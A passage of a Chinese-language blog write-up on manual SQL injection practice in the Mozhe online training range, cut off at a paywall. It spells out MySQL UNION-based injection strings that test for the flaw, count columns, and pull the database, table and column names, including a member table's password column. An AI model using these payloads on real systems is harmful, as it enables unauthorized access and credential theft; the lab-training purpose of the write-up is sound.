本文介绍了在线靶场中的数据库手工注入练习,涉及MySQL、Access、SQLServer和SQLite四种数据库。通过单引号、ORDER BY、UNION SELECT等方法判断字段长度、显示数据库和表名、获取数据,最终解密MD5密码并提交FLAG。强调了不同数据库的特性及应对策略,如Access的联合查询限制和SQLServer的特殊语法。
今天练习了墨者的线上数据库漏洞手工注入(别问为什么,问就是简单,我可以做)。注:没有钱所以只做了几个,有钱的可以全部做完。
在你们去练习的前面我需要普及一些关于数据库的知识:第一点 数据库分为关系数据库和非关系数据库,两者代表(在我的印象里面的代表)关系型.Oracle,mysql,sqlserver,Access 非关系.MongoDB。两者的主要区别就是:https://blog.youkuaiyun.com/aaronthon/article/details/81714528。
练习的类型是关系型,非关系需要币。关系型的MySQL,SqlServer,Access,SQLite。
(漏洞在公告链接)
MySQL是最常见的数据库,一:通常使用单引号,and 1=1,1=2,来判断漏洞。(不要用常规的'来隔断)
二·:接着使用order by 判断字段长度(4)
三:接着使用联合查询 and 1=2 union select 1,2,3,4 来判断第几位可以显示(2,3)
四:接着使用 and 1=2 union select 1,database(),3,4 显示数据库名称(mozhe_Discuz_StormGroup)
五:接着使用联合查询 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 显示表名(StormGroup_member,notice:应该是第一个)。
六:接着使用and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member' 显示列名(id,name,password,status)显然用
最低0.47元/天 解锁文章
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
